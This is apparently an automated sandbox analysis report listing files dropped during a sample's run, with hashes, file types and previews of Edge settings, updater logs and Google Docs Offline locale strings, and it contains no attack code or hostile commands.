                                                                                                                                                                                                                                                                                                                            SSDEEP:768:jf8BBgLoL6+vWPm0f4W8F1+UoAYDCx9Tuqh0VfUC9xbog/OVQmdXt4erw777:jf8BBOW6+vWPm0f4Wu1japmd94737
                                                                                                                                                                                                                                                                                                                            MD5:66E477495E30EE8AA013A8F513A77257
                                                                                                                                                                                                                                                                                                                            SHA1:605947E12458EDA239019A777A3FCB27D0C25978
                                                                                                                                                                                                                                                                                                                            SHA-256:7E688E6732F4E21CE5BA7B7F8518CA8D5D5C0D37559AC1F799E1DAC2973C2744
                                                                                                                                                                                                                                                                                                                            SHA-512:2CD827C48405F9A9B213819DA5FAF93FB43E5B54454CC5B811A706B40CB2D6E4F0658BCB9EA0C87A65013332ECB829C17B590DB9F8C896BFBDAE61706CF8F626
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13340960281132625","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13340960281132625","location":5,"ma
                                                                                                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):44455
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):6.089741747455916
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:768:+DXzgWPsj/qlGJqIY8GB4kW6di1zNtPl4kzZ7okEt9r1JDSgzMMd6qD47u3+Ciol:+/Ps+wsI7ynOSkzItSmd6qE7lFol
                                                                                                                                                                                                                                                                                                                            MD5:984EB5B329CECFDD591DAFAC9780511F
                                                                                                                                                                                                                                                                                                                            SHA1:4D3AC368DFE387AE387828A0D330FD7F7B170501
                                                                                                                                                                                                                                                                                                                            SHA-256:490BC57549419F27F8E720B0C23E9D7DAD7E5A9C9FC23857293A42126668FA72
                                                                                                                                                                                                                                                                                                                            SHA-512:3361E0B7EED937BDE6F4462AB688B7B08CE2A1A26D05DBD20D912F303D6271C352AD1DEE09C37FBE35AA144AD5527700CFE0538AC1BDFF570EAE523F7E79C77D
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"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
                                                                                                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):44455
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):6.089741747455916
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:768:+DXzgWPsj/qlGJqIY8GB4kW6di1zNtPl4kzZ7okEt9r1JDSgzMMd6qD47u3+Ciol:+/Ps+wsI7ynOSkzItSmd6qE7lFol
                                                                                                                                                                                                                                                                                                                            MD5:984EB5B329CECFDD591DAFAC9780511F
                                                                                                                                                                                                                                                                                                                            SHA1:4D3AC368DFE387AE387828A0D330FD7F7B170501
                                                                                                                                                                                                                                                                                                                            SHA-256:490BC57549419F27F8E720B0C23E9D7DAD7E5A9C9FC23857293A42126668FA72
                                                                                                                                                                                                                                                                                                                            SHA-512:3361E0B7EED937BDE6F4462AB688B7B08CE2A1A26D05DBD20D912F303D6271C352AD1DEE09C37FBE35AA144AD5527700CFE0538AC1BDFF570EAE523F7E79C77D
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"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
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):44455
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):6.089741747455916
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:768:+DXzgWPsj/qlGJqIY8GB4kW6di1zNtPl4kzZ7okEt9r1JDSgzMMd6qD47u3+Ciol:+/Ps+wsI7ynOSkzItSmd6qE7lFol
                                                                                                                                                                                                                                                                                                                            MD5:984EB5B329CECFDD591DAFAC9780511F
                                                                                                                                                                                                                                                                                                                            SHA1:4D3AC368DFE387AE387828A0D330FD7F7B170501
                                                                                                                                                                                                                                                                                                                            SHA-256:490BC57549419F27F8E720B0C23E9D7DAD7E5A9C9FC23857293A42126668FA72
                                                                                                                                                                                                                                                                                                                            SHA-512:3361E0B7EED937BDE6F4462AB688B7B08CE2A1A26D05DBD20D912F303D6271C352AD1DEE09C37FBE35AA144AD5527700CFE0538AC1BDFF570EAE523F7E79C77D
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"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
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):44455
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):6.089741747455916
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:768:+DXzgWPsj/qlGJqIY8GB4kW6di1zNtPl4kzZ7okEt9r1JDSgzMMd6qD47u3+Ciol:+/Ps+wsI7ynOSkzItSmd6qE7lFol
                                                                                                                                                                                                                                                                                                                            MD5:984EB5B329CECFDD591DAFAC9780511F
                                                                                                                                                                                                                                                                                                                            SHA1:4D3AC368DFE387AE387828A0D330FD7F7B170501
                                                                                                                                                                                                                                                                                                                            SHA-256:490BC57549419F27F8E720B0C23E9D7DAD7E5A9C9FC23857293A42126668FA72
                                                                                                                                                                                                                                                                                                                            SHA-512:3361E0B7EED937BDE6F4462AB688B7B08CE2A1A26D05DBD20D912F303D6271C352AD1DEE09C37FBE35AA144AD5527700CFE0538AC1BDFF570EAE523F7E79C77D
                                                                                                                                                                                                                                                                                                                            Malicious:false
Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"
                                                                                                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe
                                                                                                                                                                                                                                                                                                                            File Type:Extensible storage user DataBase, version 0x620, checksum 0x5b3f3817, page size 32768, DirtyShutdown, Windows version 10.0
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):17301504
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):1.0235370233955554
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:6144:TvQPYV7AyUO+xBGA611GJxBGA611Gv0M6JKX3XX35X3khTAvhTA/hTATX3t8nqks:4yUt3F0TkT0TAitKxK9JdIC4Ago
                                                                                                                                                                                                                                                                                                                            MD5:BC9039D26950B60BFE31D2E7B106C143
                                                                                                                                                                                                                                                                                                                            SHA1:368000881EAB6B7185DEB7C9321BB8E270B83CBC
                                                                                                                                                                                                                                                                                                                            SHA-256:CE49EC593F8FAC3B07BB07EC48105292372D522BF7A9042B045A96EB3D3BF72E
                                                                                                                                                                                                                                                                                                                            SHA-512:EA43DCE408D0B9737D0E27DA93E0878822FDC343C94A14FC887E5EBF4362D309AD721F7E39BDFEC45AF5CACCDD28FA8DB1BB4B767D37A74C9604F2A1DB003224
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):1658
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):5.413756297678275
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:48:Y4MfJVe5wMd5wMe07cIF5Io0MY5kU2A0OpJ5xnL0MotJ5VovUx0jE54t60jD5M:JIVuwEw5MUFZLBQLt7IBM
                                                                                                                                                                                                                                                                                                                            MD5:D2269B5F49C1C15238C9BBDF40149FB7
                                                                                                                                                                                                                                                                                                                            SHA1:214472ED991DA88BA2F240AD3A72517733E891C2
                                                                                                                                                                                                                                                                                                                            SHA-256:FC65BF768E1D98DA8CD23622C42451FB18B2735D14C5B0D442272EB20FF25316
                                                                                                                                                                                                                                                                                                                            SHA-512:51F8A4122075ED9514F34545F120129E64D4A8FC4650902B8A4C804472EFA85AC47DDBFEED1C9C6C1C68089C7B88EBE14056E3B434AA9CBCEF15958DE78AC531
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:{"logTime": "1005/061810", "correlationVector":"0kV+/vRB8ay0a3Cue7mk6o","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/061810", "correlationVector":"AFo3IfjRT+3l4ojiXpMdNH","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/061810", "correlationVector":"838E3BF9A44F456CB4AD62AC737EDD15","action":"FETCH_UX_CONFIG", "result":""}.{"logTime": "1005/063233", "correlationVector":"2N8fwTcZh6EtTfQ8o4+6aX","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/063233", "correlationVector":"5ADEBA42608E4CC9A1FACA719F284CF9","action":"FETCH_UX_CONFIG", "result":""}.{"logTime": "1005/063346", "correlationVector":"xp/hBMCdVPtUIxZHIviv/x","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/063347", "correlationVector":"BF0B9E58C0CC45ED9AB5D0371131E69A","action":"FETCH_UX_CONFIG", "result":""}.{"logTime": "1005/064305", "correlationVector":"ONVjsWDap1LyjIRdxsqPGs","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/064305", "correlationVector":"82E52491
                                                                                                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe
                                                                                                                                                                                                                                                                                                                            File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):2
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:3:Qn:Qn
                                                                                                                                                                                                                                                                                                                            MD5:F3B25701FE362EC84616A93A45CE9998
                                                                                                                                                                                                                                                                                                                            SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                                                                                                                                                                                                                                                                            SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                                                                                                                                                                                                                                                                            SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:..
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):11185
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):7.951995436832936
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:192:YEKh1jNlwQbamjq6Bcykrs3kAVg55GzVQM5F+XwsxNv7/lsoltBq0WG4ZeJTmrRb:fKT/BAzA05Gn5F+XV7NNltrWG4kJTm1b
                                                                                                                                                                                                                                                                                                                            MD5:78E47DDA17341BED7BE45DCCFD89AC87
                                                                                                                                                                                                                                                                                                                            SHA1:1AFDE30E46997452D11E4A2ADBBF35CCE7A1404F
                                                                                                                                                                                                                                                                                                                            SHA-256:67D161098BE68CD24FEBC0C7B48F515F199DDA72F20AE3BBB97FCF2542BB0550
                                                                                                                                                                                                                                                                                                                            SHA-512:9574A66D3756540479DC955C4057144283E09CAE11CE11EBCE801053BB48E536E67DC823B91895A9E3EE8D3CB27C065D5E9030C39A26CBF3F201348385B418A5
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):154477
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):7.835886983924039
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:3072:edP3YiyHk53xr3zWwaFYgn5JFug0HjaHNK7XeSD/r/pLbWNiOAo1np:edPYJHAzyVu7HjacuSD/rBPBOJnp
                                                                                                                                                                                                                                                                                                                            MD5:14937B985303ECCE4196154A24FC369A
                                                                                                                                                                                                                                                                                                                            SHA1:ECFE89E11A8D08CE0C8745FF5735D5EDAD683730
                                                                                                                                                                                                                                                                                                                            SHA-256:71006A5311819FEF45C659428944897184880BCDB571BF68C52B3D6EE97682FF
                                                                                                                                                                                                                                                                                                                            SHA-512:1D03C75E4D2CD57EEE7B0E93E2DE293B41F280C415FB2446AC234FC5AFD11FE2F2FCC8AB9843DB0847C2CE6BD7DF7213FCF249EA71896FBF6C0696E3F5AEE46C
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):4982
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):7.929761711048726
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:96:L7Rf7U1ylWb3KfyEfOXE+PIcvBirQFiAql1ZwKREkXCSAk:pTvWqfD+gl0sAql1u7kySAk
                                                                                                                                                                                                                                                                                                                            MD5:913064ADAAA4C4FA2A9D011B66B33183
                                                                                                                                                                                                                                                                                                                            SHA1:99EA751AC2597A080706C690612AEEEE43161FC1
                                                                                                                                                                                                                                                                                                                            SHA-256:AFB4CE8882EF7AE80976EBA7D87F6E07FCDDC8E9E84747E8D747D1E996DEA8EB
                                                                                                                                                                                                                                                                                                                            SHA-512:162BF69B1AD5122C6154C111816E4B87A8222E6994A72743ED5382D571D293E1467A2ED2FC6CC27789B644943CF617A56DA530B6A6142680C5B2497579A632B5
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):908
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):4.512512697156616
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:12:1HASvgMTCBxNB+kCIww3v+BBJ/wjsV8lCBxeBeRiGTCSU8biHULaBg/4srCBhUJJ:1HAkkJ+kCIwEg/wwbw0PXa22QLWmSDg
                                                                                                                                                                                                                                                                                                                            MD5:12403EBCCE3AE8287A9E823C0256D205
                                                                                                                                                                                                                                                                                                                            SHA1:C82D43C501FAE24BFE05DB8B8F95ED1C9AC54037
                                                                                                                                                                                                                                                                                                                            SHA-256:B40BDE5B612CFFF936370B32FB0C58CC205FC89937729504C6C0B527B60E2CBA
                                                                                                                                                                                                                                                                                                                            SHA-512:153401ECDB13086D2F65F9B9F20ACB3CEFE5E2AEFF1C31BA021BE35BF08AB0634812C33D1D34DA270E5693A8048FC5E2085E30974F6A703F75EA1622A0CA0FFD
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:{.. "createnew": {.. "message": "SKEP NUWE".. },.. "explanationofflinedisabled": {.. "message": "Jy is vanlyn. As jy Google Dokumente sonder 'n internetverbinding wil gebruik, moet jy die volgende keer as jy aan die internet gekoppel is na instellings op die Google Dokumente-tuisblad gaan en vanlynsinkronisering aanskakel.".. },.. "explanationofflineenabled": {.. "message": "Jy is vanlyn, maar jy kan nog steeds beskikbare l.ers redigeer of nuwes skep.".. },.. "extdesc": {.. "message": "Skep, wysig en bekyk jou dokumente, sigblaaie en aanbiedings . alles sonder toegang tot die internet.".. },.. "extname": {.. "message": "Google Vanlyn Dokumente".. },.. "learnmore": {.. "message": "Kom meer te wete".. },.. "popuphelptext": {.. "message": "Skryf, redigeer en werk saam, waar jy ook al is, met of sonder 'n internetverbinding.".. }..}..
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):1285
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):4.702209356847184
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:24:1HAn6bfEpxtmqMI91ivWjm/6GcCIoToCZzlgkX/Mj:W6bMt3MITFjm/Pcd4oCZhg6k
                                                                                                                                                                                                                                                                                                                            MD5:9721EBCE89EC51EB2BAEB4159E2E4D8C
                                                                                                                                                                                                                                                                                                                            SHA1:58979859B28513608626B563138097DC19236F1F
                                                                                                                                                                                                                                                                                                                            SHA-256:3D0361A85ADFCD35D0DE74135723A75B646965E775188F7DCDD35E3E42DB788E
                                                                                                                                                                                                                                                                                                                            SHA-512:FA3689E8663565D3C1C923C81A620B006EA69C99FB1EB15D07F8F45192ED9175A6A92315FA424159C1163382A3707B25B5FC23E590300C62CBE2DACE79D84871
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):1244
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):4.5533961615623735
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:12:1HASvgPCBxNhieFTr9ogjIxurIyJCCBxeh6wAZKn7uCSUhStuysUm+WCBhSueW1Y:1HAgJzoaC6VEn7Css8yoXzzd
                                                                                                                                                                                                                                                                                                                            MD5:3EC93EA8F8422FDA079F8E5B3F386A73
                                                                                                                                                                                                                                                                                                                            SHA1:24640131CCFB21D9BC3373C0661DA02D50350C15
                                                                                                                                                                                                                                                                                                                            SHA-256:ABD0919121956AB535E6A235DE67764F46CFC944071FCF2302148F5FB0E8C65A
                                                                                                                                                                                                                                                                                                                            SHA-512:F40E879F85BC9B8120A9B7357ED44C22C075BF065F45BEA42BD5316AF929CBD035D5D6C35734E454AEF5B79D378E51A77A71FA23F9EBD0B3754159718FCEB95C
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):977
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):4.867640976960053
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:24:1HAWNjbwlmyuAoW32Md+80cVLdUSERHtRo3SjX:J3wlzs42m+8TV+S4H0CjX
                                                                                                                                                                                                                                                                                                                            MD5:9A798FD298008074E59ECC253E2F2933
                                                                                                                                                                                                                                                                                                                            SHA1:1E93DA985E880F3D3350FC94F5CCC498EFC8C813
                                                                                                                                                                                                                                                                                                                            SHA-256:628145F4281FA825D75F1E332998904466ABD050E8B0DC8BB9B6A20488D78A66
                                                                                                                                                                                                                                                                                                                            SHA-512:9094480379F5AB711B3C32C55FD162290CB0031644EA09A145E2EF315DA12F2E55369D824AF218C3A7C37DD9A276AEEC127D8B3627D3AB45A14B0191ED2BBE70
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:{.. "createnew": {.. "message": "YEN.S.N. YARADIN".. },.. "explanationofflinedisabled": {.. "message": "Oflayns.n.z. Google S.n.di internet ba.lant.s. olmadan istifad. etm.k ist.yirsinizs., Google S.n.din .sas s.hif.sind. ayarlara gedin v. n.vb.ti d.f. internet. qo.ulanda oflayn sinxronizasiyan. aktiv edin.".. },.. "explanationofflineenabled": {.. "message": "Oflayns.n.z, amma m.vcud fayllar. redakt. ed. v. yenil.rini yarada bil.rsiniz.".. },.. "extdesc": {.. "message": "S.n.d, c.dv.l v. t.qdimatlar.n ham.s.n. internet olmadan redakt. edin, yarad.n v. bax.n.".. },.. "extname": {.. "message": "Google S.n.d Oflayn".. },.. "learnmore": {.. "message": ".trafl. M.lumat".. },.. "popuphelptext": {.. "message": "Harda olma..n.zdan v. internet. qo.ulu olub-olmad...n.zdan as.l. olmayaraq, yaz.n, redakt. edin v. .m.kda.l.q edin.".. }..}..
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):3107
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):3.535189746470889
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:48:YOWdTQ0QRk+QyJQAy6Qg4QWSe+QECTQLHQlQIfyQ0fnWQjQDrTQik+QvkZTQ+89b:GdTbyRvwgbCTEHQhyVues9oOT3rOCkV
                                                                                                                                                                                                                                                                                                                            MD5:68884DFDA320B85F9FC5244C2DD00568
                                                                                                                                                                                                                                                                                                                            SHA1:FD9C01E03320560CBBB91DC3D1917C96D792A549
                                                                                                                                                                                                                                                                                                                            SHA-256:DDF16859A15F3EB3334D6241975CA3988AC3EAFC3D96452AC3A4AFD3644C8550
                                                                                                                                                                                                                                                                                                                            SHA-512:7FF0FBD555B1F9A9A4E36B745CBFCAD47B33024664F0D99E8C080BE541420D1955D35D04B5E973C07725573E592CD0DD84FDBB867C63482BAFF6929ADA27CCDE
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):1389
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):4.561317517930672
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):1763
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):4.25392954144533
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):930
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):4.569672473374877
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:{.. "createnew": {.. "message": "CREA'N UN DE NOU".. },.. "explanationofflinedisabled": {.. "message": "No tens connexi.. Per utilitzar Documents de Google sense connexi. a Internet, ves a la configuraci. de la p.gina d'inici d'aquest servei i activa l'opci. per sincronitzar-se sense connexi. la propera vegada que estiguis connectat a la xarxa.".. },.. "explanationofflineenabled": {.. "message": "Tot i que no tens connexi., pots editar o crear fitxers.".. },.. "extdesc": {.. "message": "Edita, crea i consulta documents, fulls de c.lcul i presentacions, tot sense acc.s a Internet.".. },.. "extname": {.. "message": "Documents de Google sense connexi.".. },.. "learnmore": {.. "message": "M.s informaci.".. },.. "popuphelptext": {.. "message": "Escriu text, edita fitxers i col.labora-hi siguis on siguis, amb o sense connexi. a Internet.".. }..}..
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):913
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):4.947221919047
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:{.. "createnew": {.. "message": "VYTVO.IT".. },.. "explanationofflinedisabled": {.. "message": "Jste offline. Pokud chcete Dokumenty Google pou..vat bez p.ipojen. k.internetu, a. budete p...t. online, p.ejd.te do nastaven. na domovsk. str.nce Dokument. Google a.zapn.te offline synchronizaci.".. },.. "explanationofflineenabled": {.. "message": "Jste offline, ale st.le m..ete upravovat dostupn. soubory nebo vytv..et nov..".. },.. "extdesc": {.. "message": "Upravujte, vytv..ejte a.zobrazujte sv. dokumenty, tabulky a.prezentace . v.e bez p..stupu k.internetu.".. },.. "extname": {.. "message": "Dokumenty Google offline".. },.. "learnmore": {.. "message": "Dal.. informace".. },.. "popuphelptext": {.. "message": "Pi.te, upravujte a.spolupracujte kdekoli, s.p.ipojen.m k.internetu i.bez n.j.".. }..}..
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):806
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):4.815663786215102
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            Malicious:false
